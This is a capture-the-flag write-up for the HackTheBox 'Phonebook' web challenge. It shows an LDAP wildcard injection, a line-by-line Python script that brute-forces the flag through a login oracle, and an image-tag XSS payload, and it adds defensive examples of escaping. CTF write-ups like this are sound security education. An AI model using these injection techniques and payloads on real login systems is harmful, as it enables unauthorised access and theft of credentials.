
Phonebook: HackTheBox Web challenge My Perspective


First I looked for any cookies, then I thought it might be an SQL injection:

Then I used ffuf but didn't find anything interesting. ffuf is a fast web fuzzer written in Go that supports typical directory discovery, virtual host discovery (without DNS records) and GET and POST parameter fuzzing.

Vulnerability:

I see that the note from Reese states that we can log in using the workstation's username and password. This hints that it is probably using LDAP authentication.

Let's test:

It is using LDAP authentication.

Then I searched for the user Reese. The results prove that the user exists. I then entered "A*" into the search filter, hoping that all matching names would appear.

So I tried the username with an asterisk (*) as the password.

This works. I think the flag may be the password, so I tried this:

'username': 'Reese','password': 'HTB{*'

It works. So let's write a Python script to brute-force the flag:

You can find the code here:

  1. import requests: This imports the requests library, which allows Python to send HTTP requests using simple commands.
  2. import string: This imports the string module, which provides various string-related functions.
  3. ip = '161.35.36.167:30840': This defines a variable ip which holds the IP address and port of the target website.
  4. url = f'http://{ip}/login': This creates a string url which holds the URL of the login page of the target website.
  5. check = f'http://{ip}/': This creates a string check which holds the URL of the home page of the target website.
  6. alphabet = list(string.ascii_lowercase + string.digits + string.punctuation + string.whitespace): This creates a list alphabet which contains all lowercase letters, digits, punctuation marks and whitespace characters.
  7. alphabet.remove('*'): This removes the * character from the alphabet list.
  8. data = {'username': 'Reese', 'password': 'anything'}: This creates a dictionary data with two key-value pairs, where the username is Reese and the password is anything.
  9. result = 'HTB{': This initializes a string result to HTB{.
  10. flag = True: This sets a boolean variable flag to True.
  11. while flag:: This starts a while loop which runs as long as flag is True.
  12. for a in alphabet:: This starts a for loop which iterates over each character a in the alphabet list.
  13. data['password'] = result + a + '*': This sets the value of password in the data dictionary to result followed by a and then *.
  14. res = requests.post(url, data=data).url: This sends a POST request to the login page of the target website with the data dictionary as the payload, and assigns the URL of the response to the res variable.
  15. if res == check:: This checks if the res variable is equal to the check variable.
  16. result += a: This appends the character a to the result variable.
  17. print(result): This prints the current value of the result variable.
  18. if a == '}': flag = False: This checks if the character a is equal to }, and sets the flag variable to False if it is.
  19. break: This exits the for loop and continues with the while loop.
  20. print(result): This prints the final value of the result variable.
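As an added example (not code from the write-up), the following Python emulates the LDAP substring matching that makes a password of HTB{* succeed, and shows the RFC 4515 escaping that closes the hole. The filter shape (&(uid=...)(userPassword=...)) and the directory entry are assumptions, and the flag value is a placeholder.

```python
import re

# Constructed sample entry standing in for the challenge's LDAP backend.
# The password value is a placeholder, not the real flag.
DIRECTORY_ENTRY = {"uid": "Reese", "userPassword": "HTB{placeholder_flag}"}


def ldap_escape(value: str) -> str:
    """Escape the characters RFC 4515 reserves inside filter assertion values."""
    table = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}
    return "".join(table.get(ch, ch) for ch in value)


def assertion_matches(assertion: str, actual: str) -> bool:
    """Emulate LDAP substring matching: a bare '*' is a wildcard, '\\2a' is a literal '*'."""
    pieces = []
    for part in assertion.split("*"):
        # decode RFC 4515 hex escapes back to the literal character they stand for
        literal = re.sub(r"\\([0-9a-fA-F]{2})",
                         lambda m: chr(int(m.group(1), 16)), part)
        pieces.append(re.escape(literal))
    return re.fullmatch(".*".join(pieces), actual) is not None


def build_filter(username: str, password: str, escape: bool) -> str:
    """Assumed server-side filter; escape=False is the injectable form."""
    if escape:
        username, password = ldap_escape(username), ldap_escape(password)
    return f"(&(uid={username})(userPassword={password}))"


def authenticates(username: str, password: str, escape: bool) -> bool:
    """Evaluate both assertions of build_filter() against the sample entry."""
    if escape:
        username, password = ldap_escape(username), ldap_escape(password)
    return (assertion_matches(username, DIRECTORY_ENTRY["uid"])
            and assertion_matches(password, DIRECTORY_ENTRY["userPassword"]))


if __name__ == "__main__":
    for pw in ["*", "HTB{*", "HTB{placeholder_flag}"]:
        print(f"{pw!r:26} unescaped={authenticates('Reese', pw, False)} "
              f"escaped={authenticates('Reese', pw, True)}")
```

With escaping in place only the exact password authenticates, so the character-by-character oracle the script relies on disappears.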

I also found an XSS Vulnerability:

http://183.163.135.60:45329/login?message=Authentication failed

Whatever is in the message is written on the page:

But it blocks the script tag, so I used an image tag instead; payload:

<img src=x onerror=alert('Adi')>, and it worked.
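Added example, not from the original post: a filter that strips only script tags, as the page reports, lets the image-tag payload through, while HTML-encoding the message parameter before it is placed in the page neutralizes it. The two rendering templates and the detection regex are assumptions.

```python
import html
import re

# Constructed inputs: the benign message the page normally shows, and the
# payload from the write-up.
BENIGN_MESSAGE = "Authentication failed"
IMG_PAYLOAD = "<img src=x onerror=alert('Adi')>"


def render_blocklist(message: str) -> str:
    """Assumed shape of the challenge's filter: strips <script> tags and nothing else."""
    cleaned = re.sub(r"</?script\b[^>]*>", "", message, flags=re.IGNORECASE)
    return f'<p class="message">{cleaned}</p>'


def render_encoded(message: str) -> str:
    """Hardened form: contextual output encoding for an HTML text node."""
    return f'<p class="message">{html.escape(message, quote=True)}</p>'


def has_active_markup(rendered: str) -> bool:
    """Crude check for a tag carrying an on* event handler or a surviving script tag."""
    pattern = r"<\w+[^>]*\son\w+\s*=|<script\b"
    return re.search(pattern, rendered, re.IGNORECASE) is not None


if __name__ == "__main__":
    for msg in [BENIGN_MESSAGE, "<script>alert(1)</script>", IMG_PAYLOAD]:
        print(f"blocklist active={has_active_markup(render_blocklist(msg))} "
              f"encoded active={has_active_markup(render_encoded(msg))}")
```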
